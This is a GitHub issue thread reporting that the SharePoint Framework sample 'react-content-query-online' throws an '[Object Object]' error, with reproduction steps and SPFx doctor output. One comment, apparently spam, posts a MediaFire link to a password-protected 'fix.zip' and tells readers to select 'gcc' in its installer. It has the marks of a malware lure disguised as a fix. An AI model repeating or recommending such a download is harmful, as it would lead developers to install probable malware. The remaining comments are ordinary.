### ISSUE TITLE
react-content-query-online - Web part is throwing [Object Object]Error

### ISSUE THREAD

**Issue by Ritu-In** [pnp/sp-dev-fx-webparts#5214]
### Disclaimer

Yes

### Sample

react-content-query-online

### Contributor(s)

@YOURGITHUBUSERNAME

### What happened?

When using the latest version of Content Query webpart for Online. 
The webpart throws an error when added to the page
 
![image](https://github.com/user-attachments/assets/46e6515e-2f3a-4a81-9c5d-9a1fcac79a81)

I have checked the version compatibility of my build environment is as follows: 
Node -  v18.20 
Yo Generator - v1.19.0 
Gulp - v4.0.2

### Steps to reproduce

1. Clone the latest sample repo
2. Build the content query webpart in local environment
3. Upload the sppkg file to app center. Add the app to the site collection. Add the app to the page

### Expected behavior

Should render the webpart.

### Target SharePoint environment

SharePoint Online

### Developer environment

Windows

### Browsers

- [ ] Internet Explorer
- [X] Microsoft Edge
- [X] Google Chrome
- [ ] FireFox
- [ ] Safari
- [ ] mobile (iOS/iPadOS)
- [ ] mobile (Android)
- [ ] not applicable
- [ ] other (enter in the "Additional environment details" area below)

### What version of Node.js is currently installed on your workstation?

v18.20.4

### What version of Node.js is required by the sample?

[Node.js v16 | v18]

### Paste the results of SPFx doctor

√ SharePoint Framework v1.18.2
√ Node v18.20.4
√ yo v5.0.0
√ gulp-cli v2.3.0
√ bundled typescript used
[
  {
    "check": "SharePoint Framework",
    "passed": true,
    "version": "1.18.2",
    "message": "SharePoint Framework v1.18.2 valid."
  },
  {
    "check": "SharePoint Framework",
    "passed": true,
    "version": "1.18.2",
    "message": "SharePoint Framework v1.18.2"
  },
  {
    "check": "Node",
    "passed": true,
    "message": "Node v18.20.4",
    "version": "18.20.4"
  },
  {
    "check": "yo",
    "passed": true,
    "message": "yo v5.0.0",
    "version": "5.0.0"
  },
  {
    "check": "gulp-cli",
    "passed": true,
    "message": "gulp-cli v2.3.0",
    "version": "2.3.0"
  },
  {
    "check": "typescript",
    "passed": true,
    "message": "bundled typescript used"
  }
]

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by idris-m121** [comment]
Adding sample authors @PopWarner @hugoabernier @PaoloPia @spplante @Abderahman88
